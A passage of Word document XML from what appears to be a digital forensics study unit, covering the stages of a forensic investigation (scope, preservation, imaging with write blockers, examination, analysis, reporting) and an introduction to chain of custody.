          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtain legal authority (warrant, written permission of the owner, or organisation policy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Define the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — which devices, which time period, which questions need answers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">List possible evidence sources: computers, phones, servers, cloud accounts, logs, network devices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note whether devices are on or off, since running systems hold volatile evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A clear scope is important. Without it, an investigator may collect far more data than needed, waste time, and even violate privacy rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 2 — Preservation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Preservation means </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">protecting evidence from being changed, lost or contaminated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before it is collected. The scene is secured, unauthorised persons are kept away, and the state of devices is documented — photographs, notes about what is on screen, what is connected, and the exact time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not switch a running machine off or on without a plan — RAM would be lost, or timestamps would change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disconnect the machine from the network only if the situation requires it (for example to stop data being wiped remotely), and document this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Label and seal devices; use anti-static bags and Faraday bags for phones (to block signals so that remote wipe cannot happen).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 3 — Collection (Acquisition)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Collection is the actual gathering of data from the evidence sources using approved methods. The most important method is making a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">forensic image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — an exact bit-by-bit copy of a storage device — using a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">write blocker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that nothing is written to the original. The data is collected in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">order of volatility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RAM first, disk later) and verified with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">hash values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. All of this is explained in detail in Unit II.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 4 — Examination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Examination is the technical stage where the collected data is processed to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the items that might be relevant. The investigator works only on the forensic copy, never on the original.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the image in tools such as Autopsy or FTK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recover deleted files, search by keyword, filter by file type or date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract artefacts — registry hives, event logs, browser history, email databases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove noise (known system files, for example by comparing against hash sets).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 5 — Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis is the thinking stage. Examination </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">finds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data; analysis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">interprets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it. The investigator connects different artefacts, compares timestamps, rebuilds the sequence of events, and decides what the evidence really means in relation to the case questions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Correlate artefacts from several sources (event log + registry + file system + network).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Build a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test more than one explanation — there may be an innocent reason for what looks suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Clearly separate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">facts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (what the artefact shows) from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">interpretation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (what it probably means).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 6 — Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The findings are presented in a formal written </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">forensic report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It should explain what was investigated, what evidence was examined, how it was examined, what was found, and what conclusion the evidence supports. The report may be read by management, lawyers, a judge or another expert, so it must be clear, objective and complete. (Report structure is covered in Unit V.)</w:t>
      </w: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The simplified 4-stage model</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Many textbooks and NIST’s guidance condense these six stages into four: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Assess → Acquire → Analyse → Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (or NIST’s Collection → Examination → Analysis → Reporting). They are the same process explained at different levels of detail. For your exam, write the six stages given in the syllabus.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7 Chain of Custody</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain of custody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the written history of an evidence item — from the moment it is collected until it is finally returned or destroyed. It records </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handled the evidence, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">when</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where</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why</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and in what </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Think of it as a passport for the evidence, with a stamp at every stop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Life of an evidence item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rPr>
          <w:cantSplit/>
        </w:trPr>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Collected &amp; labelled</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Sealed &amp; packed</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Transferred</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Examined</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Stored securely</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Returned / Destroyed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
